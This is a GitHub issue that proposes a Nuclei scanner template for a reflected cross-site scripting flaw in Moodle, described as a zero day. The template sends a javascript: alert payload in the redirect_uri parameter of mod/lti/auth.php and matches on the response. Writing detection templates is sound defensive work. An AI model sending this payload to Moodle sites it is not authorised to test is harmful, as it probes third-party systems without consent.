### ISSUE TITLE
[nuclei-template] moodle-xss-0-day 

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1269]
```yaml
id: moodle-zero-day-xss

info:
  name: Moodle zero day XSS
  author: hackergautam
  description: Cross-site Scripting in moodle
  severity: medium
  tags: moodle,xss
  reference: unknown

requests:
  - method: GET
    path:
      - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('xss')"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xss"

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
```

<img width="1476" alt="Screenshot 2021-04-12 at 5 44 42 PM" src="https://user-images.githubusercontent.com/18241082/114393323-83f31b00-9bb7-11eb-90ce-6c1ac782d446.png">
